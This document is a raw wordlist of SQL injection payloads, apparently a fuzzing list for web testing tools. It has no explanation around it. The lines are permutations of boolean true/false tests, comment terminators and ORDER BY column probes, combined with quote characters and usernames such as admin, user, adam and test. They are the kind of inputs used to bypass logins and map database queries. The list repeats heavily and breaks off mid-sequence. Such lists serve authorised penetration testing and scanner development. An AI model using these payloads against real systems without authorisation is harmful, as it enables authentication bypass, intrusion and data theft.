' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
' AND 1="0--
' AND 1="1--
' AND 1="0-- -;
' AND 1="1-- -;
' AND 1="0-- -
' AND 1="1-- -
' AND 1="0#
' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
' AND 1="0--
' AND 1="1--
' AND 1="0-- -;
' AND 1="1-- -;
' AND 1="0-- -
' AND 1="1-- -
' AND 1="0#
' AND 1="1#
' AND 1="0;
' AND 1="1;
' AND 1="0;#
' AND 1="1;#
' AND 1="0/*
' AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
" AND 1="0--
" AND 1="1--
" AND 1="0-- -;
" AND 1="1-- -;
" AND 1="0-- -
" AND 1="1-- -
" AND 1="0#
" AND 1="1#
" AND 1="0;
" AND 1="1;
" AND 1="0;#
" AND 1="1;#
" AND 1="0/*
" AND 1="1/*
user" AND 1="0--
user" AND 1="1--
user" AND 1="0-- -;
user" AND 1="1-- -;
user" AND 1="0-- -
user" AND 1="1-- -
user" AND 1="0#
user" AND 1="1#
user" AND 1="0;
user" AND 1="1;
user" AND 1="0;#
user" AND 1="1;#
user" AND 1="0/*
user" AND 1="1/*
admin" AND 1="0--
admin" AND 1="1--
admin" AND 1="0-- -;
admin" AND 1="1-- -;
admin" AND 1="0-- -
admin" AND 1="1-- -
admin" AND 1="0#
admin" AND 1="1#
admin" AND 1="0;
admin" AND 1="1;
admin" AND 1="0;#
admin" AND 1="1;#
admin" AND 1="0/*
admin" AND 1="1/*
adam" AND 1="0--
adam" AND 1="1--
adam" AND 1="0-- -;
adam" AND 1="1-- -;
adam" AND 1="0-- -
adam" AND 1="1-- -
adam" AND 1="0#
adam" AND 1="1#
adam" AND 1="0;
adam" AND 1="1;
adam" AND 1="0;#
adam" AND 1="1;#
adam" AND 1="0/*
adam" AND 1="1/*
test" AND 1="0--
test" AND 1="1--
test" AND 1="0-- -;
test" AND 1="1-- -;
test" AND 1="0-- -
test" AND 1="1-- -
test" AND 1="0#
test" AND 1="1#
test" AND 1="0;
test" AND 1="1;
test" AND 1="0;#
test" AND 1="1;#
test" AND 1="0/*
test" AND 1="1/*
user' AND 1="0--
user' AND 1="1--
user' AND 1="0-- -;
user' AND 1="1-- -;
user' AND 1="0-- -
user' AND 1="1-- -
user' AND 1="0#
user' AND 1="1#
user' AND 1="0;
user' AND 1="1;
user' AND 1="0;#
user' AND 1="1;#
user' AND 1="0/*
user' AND 1="1/*
admin' AND 1="0--
admin' AND 1="1--
admin' AND 1="0-- -;
admin' AND 1="1-- -;
admin' AND 1="0-- -
admin' AND 1="1-- -
admin' AND 1="0#
admin' AND 1="1#
admin' AND 1="0;
admin' AND 1="1;
admin' AND 1="0;#
admin' AND 1="1;#
admin' AND 1="0/*
admin' AND 1="1/*
adam' AND 1="0--
adam' AND 1="1--
adam' AND 1="0-- -;
adam' AND 1="1-- -;
adam' AND 1="0-- -
adam' AND 1="1-- -
adam' AND 1="0#
adam' AND 1="1#
adam' AND 1="0;
adam' AND 1="1;
adam' AND 1="0;#
adam' AND 1="1;#
adam' AND 1="0/*
adam' AND 1="1/*
test' AND 1="0--
test' AND 1="1--
test' AND 1="0-- -;
test' AND 1="1-- -;
test' AND 1="0-- -
test' AND 1="1-- -
test' AND 1="0#
test' AND 1="1#
test' AND 1="0;
test' AND 1="1;
test' AND 1="0;#
test' AND 1="1;#
test' AND 1="0/*
test' AND 1="1/*
user AND 1="0--
user AND 1="1--
user AND 1="0-- -;
user AND 1="1-- -;
user AND 1="0-- -
user AND 1="1-- -
user AND 1="0#
user AND 1="1#
user AND 1="0;
user AND 1="1;
user AND 1="0;#
user AND 1="1;#
user AND 1="0/*
user AND 1="1/*
admin AND 1="0--
admin AND 1="1--
admin AND 1="0-- -;
admin AND 1="1-- -;
admin AND 1="0-- -
admin AND 1="1-- -
admin AND 1="0#
admin AND 1="1#
admin AND 1="0;
admin AND 1="1;
admin AND 1="0;#
admin AND 1="1;#
admin AND 1="0/*
admin AND 1="1/*
adam AND 1="0--
adam AND 1="1--
adam AND 1="0-- -;
adam AND 1="1-- -;
adam AND 1="0-- -
adam AND 1="1-- -
adam AND 1="0#
adam AND 1="1#
adam AND 1="0;
adam AND 1="1;
adam AND 1="0;#
adam AND 1="1;#
adam AND 1="0/*
adam AND 1="1/*
test AND 1="0--
test AND 1="1--
test AND 1="0-- -;
test AND 1="1-- -;
test AND 1="0-- -
test AND 1="1-- -
test AND 1="0#
test AND 1="1#
test AND 1="0;
test AND 1="1;
test AND 1="0;#
test AND 1="1;#
test AND 1="0/*
test AND 1="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
 AND 0="0--
 AND 0="1--
 AND 0="0-- -;
 AND 0="1-- -;
 AND 0="0-- -
 AND 0="1-- -
 AND 0="0#
 AND 0="1#
 AND 0="0;
 AND 0="1;
 AND 0="0;#
 AND 0="1;#
 AND 0="0/*
 AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
' AND 0="0--
' AND 0="1--
' AND 0="0-- -;
' AND 0="1-- -;
' AND 0="0-- -
' AND 0="1-- -
' AND 0="0#
' AND 0="1#
' AND 0="0;
' AND 0="1;
' AND 0="0;#
' AND 0="1;#
' AND 0="0/*
' AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
" AND 0="0--
" AND 0="1--
" AND 0="0-- -;
" AND 0="1-- -;
" AND 0="0-- -
" AND 0="1-- -
" AND 0="0#
" AND 0="1#
" AND 0="0;
" AND 0="1;
" AND 0="0;#
" AND 0="1;#
" AND 0="0/*
" AND 0="1/*
user" AND 0="0--
user" AND 0="1--
user" AND 0="0-- -;
user" AND 0="1-- -;
user" AND 0="0-- -
user" AND 0="1-- -
user" AND 0="0#
user" AND 0="1#
user" AND 0="0;
user" AND 0="1;
user" AND 0="0;#
user" AND 0="1;#
user" AND 0="0/*
user" AND 0="1/*
admin" AND 0="0--
admin" AND 0="1--
admin" AND 0="0-- -;
admin" AND 0="1-- -;
admin" AND 0="0-- -
admin" AND 0="1-- -
admin" AND 0="0#
admin" AND 0="1#
admin" AND 0="0;
admin" AND 0="1;
admin" AND 0="0;#
admin" AND 0="1;#
admin" AND 0="0/*
admin" AND 0="1/*
adam" AND 0="0--
adam" AND 0="1--
adam" AND 0="0-- -;
adam" AND 0="1-- -;
adam" AND 0="0-- -
adam" AND 0="1-- -
adam" AND 0="0#
adam" AND 0="1#
adam" AND 0="0;
adam" AND 0="1;
adam" AND 0="0;#
adam" AND 0="1;#
adam" AND 0="0/*
adam" AND 0="1/*
test" AND 0="0--
test" AND 0="1--
test" AND 0="0-- -;
test" AND 0="1-- -;
test" AND 0="0-- -
test" AND 0="1-- -
test" AND 0="0#
test" AND 0="1#
test" AND 0="0;
test" AND 0="1;
test" AND 0="0;#
test" AND 0="1;#
test" AND 0="0/*
test" AND 0="1/*
user' AND 0="0--
user' AND 0="1--
user' AND 0="0-- -;
user' AND 0="1-- -;
user' AND 0="0-- -
user' AND 0="1-- -
user' AND 0="0#
user' AND 0="1#
user' AND 0="0;
user' AND 0="1;
user' AND 0="0;#
user' AND 0="1;#
user' AND 0="0/*
user' AND 0="1/*
admin' AND 0="0--
admin' AND 0="1--
admin' AND 0="0-- -;
admin' AND 0="1-- -;
admin' AND 0="0-- -
admin' AND 0="1-- -
admin' AND 0="0#
admin' AND 0="1#
admin' AND 0="0;
admin' AND 0="1;
admin' AND 0="0;#
admin' AND 0="1;#
admin' AND 0="0/*
admin' AND 0="1/*
adam' AND 0="0--
adam' AND 0="1--
adam' AND 0="0-- -;
adam' AND 0="1-- -;
adam' AND 0="0-- -
adam' AND 0="1-- -
adam' AND 0="0#
adam' AND 0="1#
adam' AND 0="0;
adam' AND 0="1;
adam' AND 0="0;#
adam' AND 0="1;#
adam' AND 0="0/*
adam' AND 0="1/*
test' AND 0="0--
test' AND 0="1--
test' AND 0="0-- -;
test' AND 0="1-- -;
test' AND 0="0-- -
test' AND 0="1-- -
test' AND 0="0#
test' AND 0="1#
test' AND 0="0;
test' AND 0="1;
test' AND 0="0;#
test' AND 0="1;#
test' AND 0="0/*
test' AND 0="1/*
user AND 0="0--
user AND 0="1--
user AND 0="0-- -;
user AND 0="1-- -;
user AND 0="0-- -
user AND 0="1-- -
user AND 0="0#
user AND 0="1#
user AND 0="0;
user AND 0="1;
user AND 0="0;#
user AND 0="1;#
user AND 0="0/*
user AND 0="1/*
admin AND 0="0--
admin AND 0="1--
admin AND 0="0-- -;
admin AND 0="1-- -;
admin AND 0="0-- -
admin AND 0="1-- -
admin AND 0="0#
admin AND 0="1#
admin AND 0="0;
admin AND 0="1;
admin AND 0="0;#
admin AND 0="1;#
admin AND 0="0/*
admin AND 0="1/*
adam AND 0="0--
adam AND 0="1--
adam AND 0="0-- -;
adam AND 0="1-- -;
adam AND 0="0-- -
adam AND 0="1-- -
adam AND 0="0#
adam AND 0="1#
adam AND 0="0;
adam AND 0="1;
adam AND 0="0;#
adam AND 0="1;#
adam AND 0="0/*
adam AND 0="1/*
test AND 0="0--
test AND 0="1--
test AND 0="0-- -;
test AND 0="1-- -;
test AND 0="0-- -
test AND 0="1-- -
test AND 0="0#
test AND 0="1#
test AND 0="0;
test AND 0="1;
test AND 0="0;#
test AND 0="1;#
test AND 0="0/*
test AND 0="1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
 OR 1='0--
 OR 1='1--
 OR 1='0-- -;
 OR 1='1-- -;
 OR 1='0-- -
 OR 1='1-- -
 OR 1='0#
 OR 1='1#
 OR 1='0;
 OR 1='1;
 OR 1='0;#
 OR 1='1;#
 OR 1='0/*
 OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
' OR 1='0--
' OR 1='1--
' OR 1='0-- -;
' OR 1='1-- -;
' OR 1='0-- -
' OR 1='1-- -
' OR 1='0#
' OR 1='1#
' OR 1='0;
' OR 1='1;
' OR 1='0;#
' OR 1='1;#
' OR 1='0/*
' OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
" OR 1='0--
" OR 1='1--
" OR 1='0-- -;
" OR 1='1-- -;
" OR 1='0-- -
" OR 1='1-- -
" OR 1='0#
" OR 1='1#
" OR 1='0;
" OR 1='1;
" OR 1='0;#
" OR 1='1;#
" OR 1='0/*
" OR 1='1/*
user" OR 1='0--
user" OR 1='1--
user" OR 1='0-- -;
user" OR 1='1-- -;
user" OR 1='0-- -
user" OR 1='1-- -
user" OR 1='0#
user" OR 1='1#
user" OR 1='0;
user" OR 1='1;
user" OR 1='0;#
user" OR 1='1;#
user" OR 1='0/*
user" OR 1='1/*
admin" OR 1='0--
admin" OR 1='1--
admin" OR 1='0-- -;
admin" OR 1='1-- -;
admin" OR 1='0-- -
admin" OR 1='1-- -
admin" OR 1='0#
admin" OR 1='1#
admin" OR 1='0;
admin" OR 1='1;
admin" OR 1='0;#
admin" OR 1='1;#
admin" OR 1='0/*
admin" OR 1='1/*
adam" OR 1='0--
adam" OR 1='1--
adam" OR 1='0-- -;
adam" OR 1='1-- -;
adam" OR 1='0-- -
adam" OR 1='1-- -
adam" OR 1='0#
adam" OR 1='1#
adam" OR 1='0;
adam" OR 1='1;
adam" OR 1='0;#
adam" OR 1='1;#
adam" OR 1='0/*
adam" OR 1='1/*
test" OR 1='0--
test" OR 1='1--
test" OR 1='0-- -;
test" OR 1='1-- -;
test" OR 1='0-- -
test" OR 1='1-- -
test" OR 1='0#
test" OR 1='1#
test" OR 1='0;
test" OR 1='1;
test" OR 1='0;#
test" OR 1='1;#
test" OR 1='0/*
test" OR 1='1/*
user' OR 1='0--
user' OR 1='1--
user' OR 1='0-- -;
user' OR 1='1-- -;
user' OR 1='0-- -
user' OR 1='1-- -
user' OR 1='0#
user' OR 1='1#
user' OR 1='0;
user' OR 1='1;
user' OR 1='0;#
user' OR 1='1;#
user' OR 1='0/*
user' OR 1='1/*
admin' OR 1='0--
admin' OR 1='1--
admin' OR 1='0-- -;
admin' OR 1='1-- -;
admin' OR 1='0-- -
admin' OR 1='1-- -
admin' OR 1='0#
admin' OR 1='1#
admin' OR 1='0;
admin' OR 1='1;
admin' OR 1='0;#
admin' OR 1='1;#
admin' OR 1='0/*
admin' OR 1='1/*
adam' OR 1='0--
adam' OR 1='1--
adam' OR 1='0-- -;
adam' OR 1='1-- -;
adam' OR 1='0-- -
adam' OR 1='1-- -
adam' OR 1='0#
adam' OR 1='1#
adam' OR 1='0;
adam' OR 1='1;
adam' OR 1='0;#
adam' OR 1='1;#
adam' OR 1='0/*
adam' OR 1='1/*
test' OR 1='0--
test' OR 1='1--
test' OR 1='0-- -;
test' OR 1='1-- -;
test' OR 1='0-- -
test' OR 1='1-- -
test' OR 1='0#
test' OR 1='1#
test' OR 1='0;
test' OR 1='1;
test' OR 1='0;#
test' OR 1='1;#
test' OR 1='0/*
test' OR 1='1/*
user OR 1='0--
user OR 1='1--
user OR 1='0-- -;
user OR 1='1-- -;
user OR 1='0-- -
user OR 1='1-- -
user OR 1='0#
user OR 1='1#
user OR 1='0;
user OR 1='1;
user OR 1='0;#
user OR 1='1;#
user OR 1='0/*
user OR 1='1/*
admin OR 1='0--
admin OR 1='1--
admin OR 1='0-- -;
admin OR 1='1-- -;
admin OR 1='0-- -
admin OR 1='1-- -
admin OR 1='0#
admin OR 1='1#
admin OR 1='0;
admin OR 1='1;
admin OR 1='0;#
admin OR 1='1;#
admin OR 1='0/*
admin OR 1='1/*
adam OR 1='0--
adam OR 1='1--
adam OR 1='0-- -;
adam OR 1='1-- -;
adam OR 1='0-- -
adam OR 1='1-- -
adam OR 1='0#
adam OR 1='1#
adam OR 1='0;
adam OR 1='1;
adam OR 1='0;#
adam OR 1='1;#
adam OR 1='0/*
adam OR 1='1/*
test OR 1='0--
test OR 1='1--
test OR 1='0-- -;
test OR 1='1-- -;
test OR 1='0-- -
test OR 1='1-- -
test OR 1='0#
test OR 1='1#
test OR 1='0;
test OR 1='1;
test OR 1='0;#
test OR 1='1;#
test OR 1='0/*
test OR 1='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
 OR 0='0--
 OR 0='1--
 OR 0='0-- -;
 OR 0='1-- -;
 OR 0='0-- -
 OR 0='1-- -
 OR 0='0#
 OR 0='1#
 OR 0='0;
 OR 0='1;
 OR 0='0;#
 OR 0='1;#
 OR 0='0/*
 OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
' OR 0='0--
' OR 0='1--
' OR 0='0-- -;
' OR 0='1-- -;
' OR 0='0-- -
' OR 0='1-- -
' OR 0='0#
' OR 0='1#
' OR 0='0;
' OR 0='1;
' OR 0='0;#
' OR 0='1;#
' OR 0='0/*
' OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
" OR 0='0--
" OR 0='1--
" OR 0='0-- -;
" OR 0='1-- -;
" OR 0='0-- -
" OR 0='1-- -
" OR 0='0#
" OR 0='1#
" OR 0='0;
" OR 0='1;
" OR 0='0;#
" OR 0='1;#
" OR 0='0/*
" OR 0='1/*
user" OR 0='0--
user" OR 0='1--
user" OR 0='0-- -;
user" OR 0='1-- -;
user" OR 0='0-- -
user" OR 0='1-- -
user" OR 0='0#
user" OR 0='1#
user" OR 0='0;
user" OR 0='1;
user" OR 0='0;#
user" OR 0='1;#
user" OR 0='0/*
user" OR 0='1/*
admin" OR 0='0--
admin" OR 0='1--
admin" OR 0='0-- -;
admin" OR 0='1-- -;
admin" OR 0='0-- -
admin" OR 0='1-- -
admin" OR 0='0#
admin" OR 0='1#
admin" OR 0='0;
admin" OR 0='1;
admin" OR 0='0;#
admin" OR 0='1;#
admin" OR 0='0/*
admin" OR 0='1/*
adam" OR 0='0--
adam" OR 0='1--
adam" OR 0='0-- -;
adam" OR 0='1-- -;
adam" OR 0='0-- -
adam" OR 0='1-- -
adam" OR 0='0#
adam" OR 0='1#
adam" OR 0='0;
adam" OR 0='1;
adam" OR 0='0;#
adam" OR 0='1;#
adam" OR 0='0/*
adam" OR 0='1/*
test" OR 0='0--
test" OR 0='1--
test" OR 0='0-- -;
test" OR 0='1-- -;
test" OR 0='0-- -
test" OR 0='1-- -
test" OR 0='0#
test" OR 0='1#
test" OR 0='0;
test" OR 0='1;
test" OR 0='0;#
test" OR 0='1;#
test" OR 0='0/*
test" OR 0='1/*
user' OR 0='0--
user' OR 0='1--
user' OR 0='0-- -;
user' OR 0='1-- -;
user' OR 0='0-- -
user' OR 0='1-- -
user' OR 0='0#
user' OR 0='1#
user' OR 0='0;
user' OR 0='1;
user' OR 0='0;#
user' OR 0='1;#
user' OR 0='0/*
user' OR 0='1/*
admin' OR 0='0--
admin' OR 0='1--
admin' OR 0='0-- -;
admin' OR 0='1-- -;
admin' OR 0='0-- -
admin' OR 0='1-- -
admin' OR 0='0#
admin' OR 0='1#
admin' OR 0='0;
admin' OR 0='1;
admin' OR 0='0;#
admin' OR 0='1;#
admin' OR 0='0/*
admin' OR 0='1/*
adam' OR 0='0--
adam' OR 0='1--
adam' OR 0='0-- -;
adam' OR 0='1-- -;
adam' OR 0='0-- -
adam' OR 0='1-- -
adam' OR 0='0#
adam' OR 0='1#
adam' OR 0='0;
adam' OR 0='1;
adam' OR 0='0;#
adam' OR 0='1;#
adam' OR 0='0/*
adam' OR 0='1/*
test' OR 0='0--
test' OR 0='1--
test' OR 0='0-- -;
test' OR 0='1-- -;
test' OR 0='0-- -
test' OR 0='1-- -
test' OR 0='0#
test' OR 0='1#
test' OR 0='0;
test' OR 0='1;
test' OR 0='0;#
test' OR 0='1;#
test' OR 0='0/*
test' OR 0='1/*
user OR 0='0--
user OR 0='1--
user OR 0='0-- -;
user OR 0='1-- -;
user OR 0='0-- -
user OR 0='1-- -
user OR 0='0#
user OR 0='1#
user OR 0='0;
user OR 0='1;
user OR 0='0;#
user OR 0='1;#
user OR 0='0/*
user OR 0='1/*
admin OR 0='0--
admin OR 0='1--
admin OR 0='0-- -;
admin OR 0='1-- -;
admin OR 0='0-- -
admin OR 0='1-- -
admin OR 0='0#
admin OR 0='1#
admin OR 0='0;
admin OR 0='1;
admin OR 0='0;#
admin OR 0='1;#
admin OR 0='0/*
admin OR 0='1/*
adam OR 0='0--
adam OR 0='1--
adam OR 0='0-- -;
adam OR 0='1-- -;
adam OR 0='0-- -
adam OR 0='1-- -
adam OR 0='0#
adam OR 0='1#
adam OR 0='0;
adam OR 0='1;
adam OR 0='0;#
adam OR 0='1;#
adam OR 0='0/*
adam OR 0='1/*
test OR 0='0--
test OR 0='1--
test OR 0='0-- -;
test OR 0='1-- -;
test OR 0='0-- -
test OR 0='1-- -
test OR 0='0#
test OR 0='1#
test OR 0='0;
test OR 0='1;
test OR 0='0;#
test OR 0='1;#
test OR 0='0/*
test OR 0='1/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
'--
'-- -;
'-- -
'#
';
';#
'/*
'--
'-- -;
'-- -
'#
';
';#
'/*
'--
'-- -;
'-- -
'#
';
';#
'/*
'--
'-- -;
'-- -
'#
';
';#
'/*
"--
"-- -;
"-- -
"#
";
";#
"/*
"--
"-- -;
"-- -
"#
";
";#
"/*
"--
"-- -;
"-- -
"#
";
";#
"/*
"--
"-- -;
"-- -
"#
";
";#
"/*
user"--
user"-- -;
user"-- -
user"#
user";
user";#
user"/*
admin"--
admin"-- -;
admin"-- -
admin"#
admin";
admin";#
admin"/*
adam"--
adam"-- -;
adam"-- -
adam"#
adam";
adam";#
adam"/*
test"--
test"-- -;
test"-- -
test"#
test";
test";#
test"/*
user'--
user'-- -;
user'-- -
user'#
user';
user';#
user'/*
admin'--
admin'-- -;
admin'-- -
admin'#
admin';
admin';#
admin'/*
adam'--
adam'-- -;
adam'-- -
adam'#
adam';
adam';#
adam'/*
test'--
test'-- -;
test'-- -
test'#
test';
test';#
test'/*
user--
user-- -;
user-- -
user#
user;
user;#
user/*
admin--
admin-- -;
admin-- -
admin#
admin;
admin;#
admin/*
adam--
adam-- -;
adam-- -
adam#
adam;
adam;#
adam/*
test--
test-- -;
test-- -
test#
test;
test;#
test/*
 ORDER BY 1--
 ORDER BY 1-- -;
 ORDER BY 1-- -
 ORDER BY 1#
 ORDER BY 1;
 ORDER BY 1;#
 ORDER BY 1/*
 ORDER BY 1--
 ORDER BY 1-- -;
 ORDER BY 1-- -
 ORDER BY 1#
 ORDER BY 1;
 ORDER BY 1;#
 ORDER BY 1/*
 ORDER BY 1--
 ORDER BY 1-- -;
 ORDER BY 1-- -
 ORDER BY 1#
 ORDER BY 1;
 ORDER BY 1;#
 ORDER BY 1/*
 ORDER BY 1--
 ORDER BY 1-- -;
 ORDER BY 1-- -
 ORDER BY 1#
 ORDER BY 1;
 ORDER BY 1;#
 ORDER BY 1/*
' ORDER BY 1--
' ORDER BY 1-- -;
' ORDER BY 1-- -
' ORDER BY 1#
' ORDER BY 1;
' ORDER BY 1;#
' ORDER BY 1/*
' ORDER BY 1--
' ORDER BY 1-- -;
' ORDER BY 1-- -
' ORDER BY 1#
' ORDER BY 1;
' ORDER BY 1;#
' ORDER BY 1/*
' ORDER BY 1--
' ORDER BY 1-- -;
' ORDER BY 1-- -
' ORDER BY 1#
' ORDER BY 1;
' ORDER BY 1;#
' ORDER BY 1/*
' ORDER BY 1--
' ORDER BY 1-- -;
' ORDER BY 1-- -
' ORDER BY 1#
' ORDER BY 1;
' ORDER BY 1;#
' ORDER BY 1/*
" ORDER BY 1--
" ORDER BY 1-- -;
" ORDER BY 1-- -
" ORDER BY 1#
" ORDER BY 1;
" ORDER BY 1;#
" ORDER BY 1/*
" ORDER BY 1--
" ORDER BY 1-- -;
" ORDER BY 1-- -
" ORDER BY 1#
" ORDER BY 1;
" ORDER BY 1;#
